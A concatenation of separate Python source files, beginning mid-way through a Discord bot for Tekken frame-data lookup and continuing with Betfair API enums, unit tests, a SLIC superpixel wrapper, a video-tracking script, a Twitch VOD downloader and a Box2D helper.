case_sensitive_toggle = True
else:
case_sensitive_toggle = False
# message content should look like this
# ![character] [move]
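# e.g. "!paul deathfist", or "!!Paul Deathfist" for a case-sensitive search
# (the character and move names here are only illustrative examples)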
userMessage = message.content
userMessage = userMessage.replace("!", "")
user_message_list = userMessage.split(" ", 1)
if len(user_message_list) <= 1:
print('! command used, but character not found/move not given\n')
return
user_Chara_Name = user_message_list[0]
user_Chara_Move = user_message_list[1]
#TODO: IMPLEMENT CHARACTER SHORTHAND NAME CONVERTER, OR CHARACTER NAMELIST DISPLAY
character_name_string = tekkenFinder.does_char_exist(user_Chara_Name)
if character_name_string:
user_Chara_Name = character_name_string.lower()
move_attribute_dict = tekkenFinder.get_Move_Details(user_Chara_Name,
user_Chara_Move,
case_sensitive_toggle)
if move_attribute_dict: # if dictionary not empty, move found
embed_MoveFound = await get_MoveFound_Embed(**move_attribute_dict)
await bot.send_message(message.channel, embed=embed_MoveFound)
else: # dictionary is empty, move not found
embed_SimilarMoves = await get_SimilarMoves_Embed(user_Chara_Name,user_Chara_Move)
await bot.send_message(message.channel, embed=embed_SimilarMoves)
await user_message_cleanup(message)
return
else:
await bot.send_message(message.channel, 'Character not found: ' + '**' + user_Chara_Name + '**')
return
await bot.process_commands(message)
@bot.command(pass_context=True)
async def legend(ctx):
"""Displays commonly used abbreviations, notations and their corresponding input icons."""
embed_legend = embedCreation.embed_legend()
await bot.say(embed=embed_legend)
await user_message_cleanup(ctx.message)
@bot.command(pass_context=True)
@commands.has_permissions(administrator=True)
async def gagcombot(ctx):
"""Gags Combot in this channel. Usable only by admin roles."""
channel = ctx.message.channel.id
combot_gagged_channels.append(channel)
f = open("lib/gagged_channels.txt","a")
f.write(channel + '\n')
f.close()
await bot.say('Mmmph! Gagging Combot.')
@bot.command(pass_context=True)
@commands.has_permissions(administrator=True)
async def ungagcombot(ctx):
"""Ungags Combot in this channel. Usable only by server admins."""
channel = ctx.message.channel.id
if channel in combot_gagged_channels:
combot_gagged_channels.remove(channel)
else:
return
# clear file contents and rewrite
open("lib/gagged_channels.txt", "w").close()
f = open("lib/gagged_channels.txt", "a")
for channel in combot_gagged_channels:
f.write(channel+'\n')
f.close()
await bot.say('Ungagged Combot. Beep Boop.')
@bot.command(pass_context=True)
async def printServers(ctx):
"""List servers with Combot. Cmd restricted to Bot Owner."""
appinfo = await bot.application_info()
owner = appinfo.owner.id
if ctx.message.author.id != owner:
print('Non-bot owner called print server.')
await bot.say('Command restricted to bot owner only.')
await user_message_cleanup(ctx.message)
return
else:
print('Bot Owner called print server.')
serverConctStr = ''
for server in bot.servers:
serverConctStr = serverConctStr + server.name + '\n'
await bot.say('Server List: \n' + serverConctStr)
await user_message_cleanup(ctx.message)
@bot.command(pass_context=True)
async def Frame_Data(ctx):
"""Use ![character] [move], !! for case-sensitive search"""
await user_message_cleanup(ctx.message)
return
@bot.command(pass_context=True)
async def invite(ctx):
"""Invite the bot to your server."""
await bot.say('Use this link to add me to your server. \nhttps://discordapp.com/oauth2/authorize?client_id=302295833208946689&scope=bot&permissions=11264')
await user_message_cleanup(ctx.message)
return
# This block of code to be used when character html pages are updated, do not edit
@bot.command(pass_context=True)
async def convertAll(ctx):
"""Converts all """
appinfo = await bot.application_info()
owner = appinfo.owner.id
if ctx.message.author.id != owner:
return
else:
await bot.say('Converting all character htmls to json.')
tekkenFinder.charJsonMassConverter()
return
@bot.event
async def on_command_error(error, ctx):
if isinstance(error, commands.CheckFailure):
await bot.send_message(ctx.message.channel, "You don't have permissions to run this.")
# ==============================================
# ==========NON COMMAND FUNCTIONS===============
# ==============================================
async def bot_message_cleanup(message):
TZ_Server_ID = '165310633884123137'
TZ_FrameChannel_ID = '315052762947649536'
TestServer_Server_ID = '302481884984639488'
TestServer_ChannelID = '303175029884059649'
Delay_Seconds = 10
if message.channel.is_private or message.channel.id == TZ_FrameChannel_ID:
# lazy workaround for TZ's frame data channel, since people spam in the character channels
# do nothing here
return
if message.server.id == TZ_Server_ID:
# lazy workaround No.2
await asyncio.sleep(Delay_Seconds)
await bot.delete_message(message)
return
if message.channel.permissions_for(message.server.me).manage_messages:
# self delete does not require server permissions,
# but tying both cleanups to one check for now until I make a controllable toggle.
await asyncio.sleep(Delay_Seconds)
await bot.delete_message(message)
return
async def user_message_cleanup(message):
Delay_Seconds = 15
if message.channel.is_private:
return
if message.channel.permissions_for(message.server.me).manage_messages:
await asyncio.sleep(Delay_Seconds)
await bot.delete_message(message)
async def is_Gagged(user_message):
message = user_message
# check if channel is gagged
if message.content != '.ungagcombot':
for channelID in combot_gagged_channels:
if message.channel.id == channelID:
return True
return False
async def get_MoveFound_Embed(**move_attribute_dict):
misc_details_Dict = tekkenFinder.get_Misc_Chara_Details(move_attribute_dict['char_name'])
embedDict = {**move_attribute_dict, **misc_details_Dict}
embed_MoveFound = embedCreation.embed_Move_Details(**embedDict)
return embed_MoveFound
async def get_SimilarMoves_Embed(user_Chara_Name, user_Chara_Move):
misc_details_Dict = tekkenFinder.get_Misc_Chara_Details(user_Chara_Name)
similar_moves_list = tekkenFinder.get_Similar_Moves(user_Chara_Name, user_Chara_Move)
embed_SimilarMoves = embedCreation.embed_Similar_Moves(similar_moves_list, user_Chara_Name, **misc_details_Dict)
return embed_SimilarMoves
#Starts the bot
bot.run(token)
handlers = log.handlers[:]
for hdlr in handlers:
hdlr.close()
log.removeHandler(hdlr)
|
500701
|
from enum import Enum
GENERIC_JSON_RPC_EXCEPTIONS = {
-32700: "Invalid JSON was received by the server. An error occurred on the server while parsing the JSON text.",
-32601: "Method not found",
-32602: "Problem parsing the parameters, or a mandatory parameter was not found",
-32603: "Internal JSON-RPC error",
}
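# Illustrative lookup (not part of the original module):
# GENERIC_JSON_RPC_EXCEPTIONS.get(-32601) returns "Method not found".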
class RaceStatusEnum(Enum):
DORMANT = "There is no data available for this race."
DELAYED = "The start of the race has been delayed"
PARADING = "The horses are in the parade ring"
GOINGDOWN = "The horses are going down to the starting post"
GOINGBEHIND = "The horses are going behind the stalls"
ATTHEPOST = "The horses are at the post"
UNDERORDERS = "The horses are loaded into the stalls/race is about to start"
OFF = "The race has started"
FINISHED = "The race has finished"
FALSESTART = "There has been a false start"
PHOTOGRAPH = "The result of the race is subject to a photo finish"
RESULT = "The result of the race has been announced"
WEIGHEDIN = "The jockeys have weighed in"
RACEVOID = "The race has been declared void"
ABANDONED = "The meeting has been cancelled"
class LoginExceptions(Enum):
INVALID_USERNAME_OR_PASSWORD = "The username or password are invalid"
ACCOUNT_NOW_LOCKED = "The account was just locked"
ACCOUNT_ALREADY_LOCKED = "The account is already locked"
PENDING_AUTH = "Pending authentication"
TELBET_TERMS_CONDITIONS_NA = "Telbet terms and conditions rejected"
DUPLICATE_CARDS = "Duplicate cards"
SECURITY_QUESTION_WRONG_3X = (
"The user has entered wrong the security answer 3 times"
)
KYC_SUSPEND = "KYC suspended"
SUSPENDED = "The account is suspended"
CLOSED = "The account is closed"
SELF_EXCLUDED = "The account has been self-excluded"
INVALID_CONNECTIVITY_TO_REGULATOR_DK = (
"The DK regulator cannot be accessed due to some internal problems in the "
"system behind or in at regulator; timeout cases included."
)
NOT_AUTHORIZED_BY_REGULATOR_DK = (
"The user identified by the given credentials is not authorized in the DKs "
"jurisdictions due to the regulators policies. Ex = the user for which "
"this session should be created is not allowed to act(play bet) in the DKs "
"jurisdiction."
)
INVALID_CONNECTIVITY_TO_REGULATOR_IT = (
"The IT regulator cannot be accessed due to some internal problems in the "
"system behind or in at regulator; timeout cases included."
)
NOT_AUTHORIZED_BY_REGULATOR_IT = (
"The user identified by the given credentials is not authorized in the ITs "
"jurisdictions due to the regulators policies. Ex = the user for which this "
"session should be created is not allowed to act(play bet) in the ITs "
"jurisdiction."
)
SECURITY_RESTRICTED_LOCATION = "The account is restricted due to security concerns"
BETTING_RESTRICTED_LOCATION = (
"The account is accessed from a location where betting is restricted"
)
TRADING_MASTER = "Trading Master Account"
TRADING_MASTER_SUSPENDED = "Suspended Trading Master Account"
AGENT_CLIENT_MASTER = "Agent Client Master"
AGENT_CLIENT_MASTER_SUSPENDED = "Suspended Agent Client Master"
DANISH_AUTHORIZATION_REQUIRED = "Danish authorization required"
SPAIN_MIGRATION_REQUIRED = "Spain migration required"
DENMARK_MIGRATION_REQUIRED = "Denmark migration required"
SPANISH_TERMS_ACCEPTANCE_REQUIRED = (
"The latest Spanish terms and conditions version must be accepted"
)
ITALIAN_CONTRACT_ACCEPTANCE_REQUIRED = (
"The latest Italian contract version must be accepted"
)
CERT_AUTH_REQUIRED = (
"Certificate required or certificate present but could not authenticate with it"
)
CHANGE_PASSWORD_REQUIRED = "<PASSWORD>"
PERSONAL_MESSAGE_REQUIRED = "Personal message required for the user"
INTERNATIONAL_TERMS_ACCEPTANCE_REQUIRE = (
"The latest international terms and conditions must be accepted prior "
"to logging in."
)
EMAIL_LOGIN_NOT_ALLOWED = "This account has not opted in to log in with the email"
MULTIPLE_USERS_WITH_SAME_CREDENTIAL = (
"There is more than one account with the same credential"
)
ACCOUNT_PENDING_PASSWORD_CHANGE = (
"The account must undergo password recovery to reactivate"
)
TEMPORARY_BAN_TOO_MANY_REQUEST = (
"The limit for successful login requests per minute has been exceeded. New "
"login attempts will be banned for 20 minutes"
)
class ApingException(Enum):
TOO_MUCH_DATA = "The operation requested too much data exceeding the Market Data Request Limits."
INVALID_INPUT_DATA = (
"The data input is invalid. A specific description is returned via errorDetails as shown "
"below."
)
INVALID_SESSION_INFORMATION = (
"The session token hasnt been provided is invalid or has expired."
)
NO_APP_KEY = (
"An application key header (X-Application) has not been provided in the request"
)
NO_SESSION = (
"A session token header (X-Authentication) has not been provided in the request"
)
UNEXPECTED_ERROR = "An unexpected internal error occurred that prevented successful request processing."
INVALID_APP_KEY = "The application key passed is invalid or is not present"
TOO_MANY_REQUESTS = (
"There are too many pending requests e.g. a listMarketBook with Order/Match projections is "
"limited to 3 concurrent requests. The error also applies to listCurrentOrders "
"listMarketProfitAndLoss and listClearedOrders if you have 3 or more requests currently "
"in execution"
)
SERVICE_BUSY = "The service is currently too busy to service this request."
TIMEOUT_ERROR = (
"The Internal call to downstream service timed out. Please note = If a TIMEOUT_ERROR error "
"occurs on a placeOrders/replaceOrders request you should check listCurrentOrders to verify the "
"status of your bets before placing further orders. Please allow up to 2 minutes for timed out "
"order to appear."
)
REQUEST_SIZE_EXCEEDS_LIMIT = (
"The request exceeds the request size limit. Requests are limited to a total of 250 "
"betId's/marketId's (or a combination of both)."
)
ACCESS_DENIED = (
"The calling client is not permitted to perform the specific action e.g. the using a Delayed "
"App Key when placing bets or attempting to place a bet from a restricted jurisdiction."
)
class MarketStatus(Enum):
INACTIVE = "The market has been created but isn't yet available."
OPEN = "The market is open for betting."
SUSPENDED = "The market is suspended and not available for betting."
CLOSED = "The market has been settled and is no longer available for betting."
class InstructionReportStatus(Enum):
SUCCESS = ""
FAILURE = ""
TIMEOUT = ""
class InstructionReportErrorCode(Enum):
INVALID_BET_SIZE = "bet size is invalid for your currency or your regulator"
INVALID_RUNNER = "Runner does not exist includes vacant traps in greyhound racing"
BET_TAKEN_OR_LAPSED = (
"Bet cannot be cancelled or modified as it has already been taken or has lapsed Includes "
"attempts to cancel/modify market on close BSP bets and cancelling limit on close BSP bets"
)
BET_IN_PROGRESS = (
"No result was received from the matcher in a timeout configured for the system"
)
RUNNER_REMOVED = "Runner has been removed from the event"
MARKET_NOT_OPEN_FOR_BETTING = "Attempt to edit a bet on a market that has closed."
LOSS_LIMIT_EXCEEDED = (
"The action has caused the account to exceed the self imposed loss limit"
)
MARKET_NOT_OPEN_FOR_BSP_BETTING = (
"Market now closed to bsp betting. Turned in-play or has been reconciled"
)
INVALID_PRICE_EDIT = (
"Attempt to edit down the price of a bsp limit on close lay bet or edit up the price of a "
"limit on close back bet"
)
INVALID_ODDS = "Odds not on price ladder - either edit or placement"
INSUFFICIENT_FUNDS = (
"Insufficient funds available to cover the bet action. Either the exposure limit or "
"available to bet limit would be exceeded"
)
INVALID_PERSISTENCE_TYPE = (
"Invalid persistence type for this market e.g. KEEP for a non bsp market"
)
ERROR_IN_MATCHER = (
"A problem with the matcher prevented this action completing successfully"
)
INVALID_BACK_LAY_COMBINATION = (
"The order contains a back and a lay for the same runner at overlapping prices. "
"This would guarantee a self match. This also applies to BSP limit on close bets"
)
ERROR_IN_ORDER = "The action failed because the parent order failed"
INVALID_BID_TYPE = "Bid type is mandatory"
INVALID_BET_ID = "Bet for id supplied has not been found"
CANCELLED_NOT_PLACED = "Bet cancelled but replacement bet was not placed"
RELATED_ACTION_FAILED = (
"Action failed due to the failure of a action on which this action is dependent"
)
NO_ACTION_REQUIRED = (
"the action does not result in any state change. eg changing a persistence to it's "
"current value"
)
class ExecutionReportStatus(Enum):
SUCCESS = "Order processed successfully"
FAILURE = "Order failed."
PROCESSED_WITH_ERRORS = (
"The order itself has been accepted but at least one (possibly all) actions have "
"generated errors. This error only occurs for replaceOrders cancelOrders and "
"updateOrders operations. The placeOrders operation will not return "
"PROCESSED_WITH_ERRORS status as it is an atomic operation."
)
TIMEOUT = "Order timed out."
class ExecutionReportErrorCode(Enum):
ERROR_IN_MATCHER = "The matcher is not healthy"
PROCESSED_WITH_ERRORS = (
"The order itself has been accepted but at least one (possibly all) actions have "
"generated errors"
)
BET_ACTION_ERROR = (
"There is an error with an action that has caused the entire order to be rejected. Check "
"the instructionReports errorCode for the reason for the rejection of the order."
)
INVALID_ACCOUNT_STATE = (
"Order rejected due to the account's status (suspended inactive dup cards)"
)
INVALID_WALLET_STATUS = "Order rejected due to the account's wallet's status"
INSUFFICIENT_FUNDS = (
"Account has exceeded its exposure limit or available to bet limit"
)
LOSS_LIMIT_EXCEEDED = "The account has exceed the self imposed loss limit"
MARKET_SUSPENDED = "Market is suspended"
MARKET_NOT_OPEN_FOR_BETTING = (
"Market is not open for betting. It is either not yet active suspended or closed "
"awaiting settlement."
)
DUPLICATE_TRANSACTION = (
"Duplicate customer reference data submitted - Please note: There is a time window "
"associated with the de-duplication of duplicate submissions which is 60 second"
)
INVALID_ORDER = (
"Order cannot be accepted by the matcher due to the combination of actions. For example bets "
"being edited are not on the same market or order includes both edits and placement"
)
INVALID_MARKET_ID = "Market doesn't exist"
PERMISSION_DENIED = (
"Business rules do not allow order to be placed. You are either attempting to place the "
"order using a Delayed Application Key or from a restricted jurisdiction (i.e. USA)"
)
DUPLICATE_BETIDS = "duplicate bet ids found"
NO_ACTION_REQUIRED = "Order hasn't been passed to matcher as system detected there will be no state change"
SERVICE_UNAVAILABLE = "The requested service is unavailable"
REJECTED_BY_REGULATOR = (
"The regulator rejected the order. On the Italian Exchange this error will occur if "
"more than 50 bets are sent in a single placeOrders request."
)
class StreamingProtocolErrors(Enum):
"""General errors not sent with id linking to specific request (as no request context)"""
INVALID_INPUT = "Failure code returned when an invalid input is provided (could not deserialize the message)"
TIMEOUT = "Failure code when a client times out (i.e. too slow sending data)"
class StreamingAuthenticationErrors(Enum):
"""Specific to authentication"""
NO_APP_KEY = (
"Failure code returned when an application key is not found in the message"
)
INVALID_APP_KEY = (
"Failure code returned when an invalid application key is received"
)
NO_SESSION = (
"Failure code returned when a session token is not found in the message"
)
INVALID_SESSION_INFORMATION = (
"Failure code returned when an invalid session token is received"
)
NOT_AUTHORIZED = (
"Failure code returned when client is not authorized to perform the operation"
)
MAX_CONNECTION_LIMIT_EXCEEDED = (
"Failure code returned when a client tries to create more connections than "
"allowed to"
)
class StreamingSubscriptionErrors(Enum):
"""Specific to subscription requests"""
SUBSCRIPTION_LIMIT_EXCEEDED = (
"Customer tried to subscribe to more markets than allowed to"
)
INVALID_CLOCK = (
"Failure code returned when an invalid clock is provided on re-subscription (check initialClk / "
"clk supplied)"
)
class StreamingGeneralErrors(Enum):
"""General errors which may or may not be linked to specific request id"""
UNEXPECTED_ERROR = (
"Failure code returned when an internal error occurred on the server"
)
CONNECTION_FAILED = (
"Failure code used when the client / server connection is terminated"
)
class StreamingSide(Enum):
"""Some enums are provided in shorthand"""
L = "LAY"
B = "BACK"
class StreamingStatus(Enum):
E = "EXECUTABLE"
EC = "EXECUTION_COMPLETE"
class StreamingPersistenceType(Enum):
L = "LAPSE"
P = "PERSIST"
MOC = "MARKET_ON_CLOSE"
class StreamingOrderType(Enum):
L = "LIMIT"
MOC = "MARKET_ON_CLOSE"
LOC = "LIMIT_ON_CLOSE"
class StreamingRegulatorCode(Enum):
REG_GGC = "GIBRALTAR REGULATOR"
|
500702
|
import unittest
from .utils import *
class TestReverseLdCoeffs(unittest.TestCase):
def test_reverse_ld_coeffs(self):
pass
class TestReverseQCoeffs(unittest.TestCase):
def test_quadratic(self):
expected_q1 = 36.
expected_q2 = 0.16666666666666666
q1, q2 = reverse_q_coeffs("quadratic", 2., 4.)
self.assertEqual(q1, expected_q1)
self.assertEqual(q2, expected_q2)
|
500706
|
import os
import unittest
from collections import namedtuple
import pandas as pd
from pmutt import cantera
class TestCantera(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
def test_get_omkm_range(self):
# Test that CTI range handles strings that can be directly converted to
# int
objs = ['0001', '0002', '0003', '0005', '0008', '0009', '0010']
CTI_range_out = '["0001 to 0003", "0005", "0008 to 0010"]'
self.assertEqual(cantera._get_omkm_range(objs=objs), CTI_range_out)
# Test that CTI range handles objects with ID as an attribute
# that can be directly converted to int
ObjWithId = namedtuple('ObjWithId', 'id')
objs_id = [ObjWithId(obj_id) for obj_id in objs]
self.assertEqual(cantera._get_omkm_range(objs=objs_id), CTI_range_out)
# Test that CTI range handles objects with name as an attribute
# that can be directly converted to int
ObjWithName = namedtuple('ObjWithName', 'name')
objs_name = [ObjWithName(obj_name) for obj_name in objs]
self.assertEqual(cantera._get_omkm_range(objs=objs_name), CTI_range_out)
# Test that CTI range handles strings that have a header and a footer
objs = [
'test_0001', 'test_0002', 'test_0003', 'test_0005', 'test_0008',
'test_0009', 'test_0010'
]
CTI_range_out = ('["test_0001 to test_0003", "test_0005", '
'"test_0008 to test_0010"]')
self.assertEqual(cantera._get_omkm_range(objs=objs), CTI_range_out)
# Test that CTI range handles multiple groups with headers and footers
objs = [
'test1_0001', 'test1_0002', 'test1_0003', 'test1_0005',
'test1_0008', 'test1_0009', 'test1_0010', 'test2_0005',
'test2_0006', 'test2_0100', '0001', '0002', '0003', '0005'
]
CTI_range_out = ('["test1_0001 to test1_0003", "test1_0005", '
'"test1_0008 to test1_0010", '
'"test2_0005 to test2_0006", "test2_0100", '
'"0001 to 0003", "0005"]')
self.assertEqual(cantera._get_omkm_range(objs=objs), CTI_range_out)
if __name__ == '__main__':
unittest.main()
|
500804
|
from cfast_slic import SlicModel
class BaseSlic(object):
arch_name = "__TODO__"
def __init__(self,
num_components=400,
slic_model=None,
compactness=10,
min_size_factor=0.25,
subsample_stride=3,
convert_to_lab=True,
preemptive=False,
preemptive_thres=0.05,
manhattan_spatial_dist=True,
debug_mode=False,
num_threads=-1):
self.compactness = compactness
self.subsample_stride = subsample_stride
self.min_size_factor = min_size_factor
self._slic_model = slic_model and slic_model.copy() or self.make_slic_model(num_components)
self._last_assignment = None
self.convert_to_lab = convert_to_lab
self._slic_model.preemptive = preemptive
self._slic_model.preemptive_thres = preemptive_thres
self._slic_model.manhattan_spatial_dist = manhattan_spatial_dist
self._slic_model.num_threads = num_threads
self._slic_model.debug_mode = debug_mode
@property
def convert_to_lab(self):
return self._slic_model.convert_to_lab
@convert_to_lab.setter
def convert_to_lab(self, v):
self._slic_model.convert_to_lab = v
@property
def slic_model(self):
return self._slic_model
@property
def last_assignment(self):
return self._last_assignment
def iterate(self, image, max_iter=10):
if not self._slic_model.initialized:
self._slic_model.initialize(image)
assignment = self._slic_model.iterate(image, max_iter, self.compactness, self.min_size_factor, self.subsample_stride)
self._last_assignment = assignment
return assignment
@property
def num_components(self):
return self._slic_model.num_components
def make_slic_model(self, num_components):
return SlicModel(num_components, self.arch_name)
class Slic(BaseSlic):
arch_name = 'standard'
class SlicRealDist(BaseSlic):
arch_name = 'standard'
real_dist_type = 'standard'
def make_slic_model(self, num_components):
model = SlicModel(num_components, self.arch_name)
model.real_dist = True
model.real_dist_type = self.real_dist_type
return model
class SlicRealDistL2(SlicRealDist):
arch_name = 'standard'
real_dist_type = 'l2'
class SlicRealDistNoQ(SlicRealDist):
arch_name = 'standard'
real_dist_type = 'noq'
def __init__(self, *args, **kwargs):
float_color = kwargs.pop("float_color", True)
super(SlicRealDistNoQ, self).__init__(*args, **kwargs)
self._slic_model.float_color = float_color
class LSC(SlicRealDist):
arch_name = 'standard'
real_dist_type = 'lsc'
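# A minimal usage sketch (assumption, not part of the original file): run plain SLIC on an
# RGB uint8 image and inspect the per-pixel cluster assignment. The image here is a placeholder.
if __name__ == "__main__":
    import numpy as np
    image = np.zeros((128, 128, 3), dtype=np.uint8)
    slic = Slic(num_components=64, compactness=10)
    assignment = slic.iterate(image)  # 2D label array with the same height and width as the image
    print(assignment.shape, slic.num_components)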
|
500912
|
from __future__ import absolute_import, division, print_function
import cv2
import os
import os.path as osp
import pprint
import time
import numpy as np
import torch
import yaml
from torch.autograd import Variable
from torch.utils.data import DataLoader
from sacred import Experiment
from tracktor.config import get_output_dir
from tracktor.resnet import resnet50
from tracktor.tracker import Tracker
from frcnn.model import test
from tracktor.utils import interpolate, plot_sequence
import data_handle
ex = Experiment()
ex.add_config('experiments/cfgs/tracktor.yaml')
ex.add_config(ex.configurations[0]._conf['tracktor']['obj_detect_config'])
ex.add_config(ex.configurations[0]._conf['tracktor']['reid_network_config'])
webcam = 'data/boli_pianduan.mp4'
@ex.automain
def main(tracktor,siamese, _config):
# set all seeds
torch.manual_seed(tracktor['seed'])
torch.cuda.manual_seed(tracktor['seed'])
np.random.seed(tracktor['seed'])
torch.backends.cudnn.deterministic = True
output_dir = osp.join(get_output_dir(tracktor['module_name']), tracktor['name'])
sacred_config = osp.join(output_dir, 'sacred_config.yaml')
if not osp.exists(output_dir):
os.makedirs(output_dir)
with open(sacred_config, 'w') as outfile:
yaml.dump(_config, outfile, default_flow_style=False)
##########################
# Initialize the modules #
##########################
# object detection
print("[*] Building object detector")
if tracktor['network'].startswith('frcnn'):
# FRCNN
from tracktor.frcnn import FRCNN
from frcnn.model import config
if _config['frcnn']['cfg_file']:
config.cfg_from_file(_config['frcnn']['cfg_file'])
if _config['frcnn']['set_cfgs']:
config.cfg_from_list(_config['frcnn']['set_cfgs'])
obj_detect = FRCNN(num_layers=101)
obj_detect.create_architecture(2, tag='default',
anchor_scales=config.cfg.ANCHOR_SCALES,
anchor_ratios=config.cfg.ANCHOR_RATIOS)
obj_detect.load_state_dict(torch.load(tracktor['obj_detect_weights']))
else:
raise NotImplementedError(f"Object detector type not known: {tracktor['network']}")
obj_detect.eval()
obj_detect.cuda()
# tracktor
tracker = Tracker(obj_detect, tracktor['tracker'])
tracker.reset() # init tracker
print("[*] Beginning evaluation...")
time_total = 0
cap = cv2.VideoCapture(webcam)
num_images = 0
images = []
try:
begin = time.time()
while (cap.isOpened()):
ret, frame = cap.read()
images.append(frame)
time.time()
try:
blob = data_handle.data_process(frame)
except:
print('over')
break
tracker.step(blob)
num_images += 1
if num_images % 10 == 0:
print('now is :',num_images)
results = tracker.get_results()
end = time.time()
print("[*] Tracks found: {}".format(len(results)))
print('It takes: {:.3f} s'.format((end-begin)))
if tracktor['write_images']:
plot_sequence(results, images, '/home/longshuz/project/tracking_wo_bnw/output/tracktor/results')
cap.release()
except:
raise KeyboardInterrupt
|
500916
|
import logging
import re
from contextlib import suppress
from datetime import timedelta, datetime, timezone
from pathlib import Path
from tempfile import NamedTemporaryFile
from time import monotonic, sleep
from typing import Callable, Optional, List, cast, ClassVar, Pattern, Tuple, IO
from urllib.parse import urljoin
import requests
from iso8601 import parse_date
from m3u8 import M3U8
from pydantic import BaseModel
from .events import StartDownloading, PlaylistUpdate, StopDownloading, DownloadedChunk
from .twitch_api import TwitchAPI
from .utils import retry_on_exception, Publisher, fails_in_row, chunked
log = logging.getLogger(__name__)
@retry_on_exception(requests.exceptions.RequestException, wait=5, max_tries=30)
def get_url(url: str) -> requests.Response:
return requests.get(url, timeout=2)
class TwitchVideo(BaseModel): # type: ignore
created_at: str
description: str
duration: str
id: str
language: str
published_at: str
thumbnail_url: str
title: str
type: str
url: str
user_id: str
view_count: int
viewable: str
class Config:
ignore_extra = False
allow_extra = True
class TwitchPlaylist:
def __init__(self, video_id: str, quality: str, variant_playlist_fetch: Callable[[], str]) -> None:
self.video_id = video_id
self.quality = quality
self._m3u8: Optional[M3U8] = None
self._url: Optional[str] = None
self._variant_m3u8: Optional[M3U8] = None
self._variant_fetch: Callable[[], str] = variant_playlist_fetch
@property
def m3u8(self) -> M3U8:
if not self._m3u8:
self.update()
return self._m3u8
@property
def files(self) -> List[str]:
return self.m3u8.files # type: ignore
@property
def base_uri(self) -> str:
return urljoin(self.url, '.')
@property
def url(self) -> str:
if not self._url:
self._url = self._get_playlist_url()
return self._url
@retry_on_exception(requests.exceptions.RequestException, max_tries=2)
def update(self, use_old_url: bool = False) -> None:
if not use_old_url:
self._url = self._get_playlist_url()
request = get_url(self.url)
self._m3u8 = M3U8(request.text)
def _get_playlist_url(self) -> str:
log.debug(f'Retrieving playlist: {self.video_id} {self.quality}')
self._variant_m3u8 = M3U8(self._variant_fetch())
try:
return cast(str,
next(playlist.uri for playlist in self._variant_m3u8.playlists if
playlist.media[0].group_id == self.quality))
except StopIteration:
qualities = [playlist.media[0].group_id for playlist in self._variant_m3u8.playlists]
msg = f"Got '{self.quality}' while expected one of {qualities}"
log.exception(msg)
raise
def segments_after(self, last_segment: Optional[str]) -> List[str]:
if last_segment is None:
return self.files
# Suppose that all segments are named like '{number}.ts' according to HLS specification
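# e.g. with files == ['0.ts', '1.ts', '2.ts', '3.ts'] and last_segment == '1.ts',
# the slice below returns ['2.ts', '3.ts'] (the segments not yet downloaded)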
n = int(last_segment.rstrip('.ts'))
if n + 1 > len(self.files):
return []
return self.files[n + 1:]
class TwitchDownloadManager(Publisher):
_CHUNK_SIZE = 10
_TIME_LIMIT = _CHUNK_SIZE * 10
_SLEEP_TIME = 30
_DURATION_RE: ClassVar[Pattern] = re.compile(r'(?:(?P<hours>\d+)h)?(?:(?P<minutes>\d+)m)?(?:(?P<seconds>\d+)s)?')
def __init__(self, twitch_api: TwitchAPI, temporary_folder: Path) -> None:
super().__init__()
self._twitch_api = twitch_api
self.temporary_folder = Path(temporary_folder)
def download(self, video_id: str, *,
quality: str = 'chunked',
video_type: Optional[str] = None) -> Tuple[TwitchVideo, Path]:
if video_type not in TwitchAPI.VIDEO_TYPES:
video_type = TwitchVideo(**self._twitch_api.get_videos(id=[video_id])[0][0]).broadcast_type
if video_type != 'archive':
raise ValueError('Only archive twitch video allowed')
return self._download_archive(video_id, quality=quality)
def _download_archive(self, video_id: str, quality: str) -> Tuple[TwitchVideo, Path]:
with NamedTemporaryFile(suffix='.ts', delete=False, dir=str(self.temporary_folder.resolve())) as file:
log.info(f'Create temporary file {file.name}')
playlist = TwitchPlaylist(video_id, quality=quality,
variant_playlist_fetch=lambda: self._twitch_api.get_variant_playlist(video_id))
is_downloaded = is_recording = False
# next(exist_new_segment) - VODs info can be glitched sometime. Duration is increasing for hours but
# no new segments are added in playlist. VOD is considered complete if there is no new segments for
# 10*_SLEEP_TIME seconds ~ 5 minutes by default (is_downloaded = is_recording = True)
exist_new_segment = fails_in_row(10)
next(exist_new_segment)
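# fails_in_row(10) is a coroutine-style generator: it is primed with next() here, fed
# bool(segments_to_load) via .send() below, and (per the note above) is assumed to keep
# yielding True until it has seen 10 falsy values in a row.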
last_segment: Optional[str] = None
log.info(f'Start downloading {video_id} with {quality} quality')
self.publish(StartDownloading(id=video_id))
while not is_downloaded or (is_recording and next(exist_new_segment)):
is_recording = self._video_is_recording(video_id)
playlist.update(use_old_url=is_downloaded)
segments_to_load = playlist.segments_after(last_segment)
exist_new_segment.send(bool(segments_to_load))
self.publish(PlaylistUpdate(total_size=len(playlist.files), to_load=len(segments_to_load)))
is_downloaded = False
for chunk in chunked(segments_to_load, self._CHUNK_SIZE):
start_time = monotonic()
# Last downloaded or previous last_segment if no segments downloaded
last_segment = self._download_chunks(playlist.base_uri, chunk, write_to=file) or last_segment
# Downloading time exceeded. Assuming that time exceeded if no segments downloaded.
if monotonic() - start_time > self._TIME_LIMIT:
break
else:
is_downloaded = True
if is_recording and is_downloaded:
sleep(self._SLEEP_TIME)
log.info(f'Downloading {video_id} with {quality} quality successful')
self.publish(StopDownloading())
return TwitchVideo(**self._twitch_api.get_videos(id=[video_id])[0][0]), Path(file.name)
def _download_chunks(self, base_uri: str, segments: List[str], write_to: IO[bytes]) -> Optional[str]:
last_segment = None
with suppress(requests.exceptions.RequestException):
for chunk in segments:
write_to.write(get_url(base_uri + chunk).content)
self.publish(DownloadedChunk())
last_segment = chunk
return last_segment
def _video_is_recording(self, video_id: str) -> bool:
video = TwitchVideo(**self._twitch_api.get_videos(id=[video_id])[0][0])
duration_match = self._DURATION_RE.fullmatch(video.duration)
if not duration_match or not any(duration_match.groupdict()):
raise ValueError(f'Duration string "{video.duration}" can not be parsed')
duration = timedelta(**{k: int(v) for k, v in duration_match.groupdict().items() if v})
# Suppose that VOD finalized correctly
return bool((datetime.now(timezone.utc) - (parse_date(video.created_at) + duration)) < timedelta(minutes=5))
|
500927
|
from Box2D import *
from typing import List
from settings import get_boxcar_constant
import math
import numpy as np
def rotate_floor_tile(coords: List[b2Vec2], center: b2Vec2, angle: float) -> List[b2Vec2]:
"""
Rotate a given floor tile by some number of degrees.
"""
rads = angle * math.pi / 180.0 # Degree to radians
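# Each vertex p is rotated about `center` by the standard 2D rotation:
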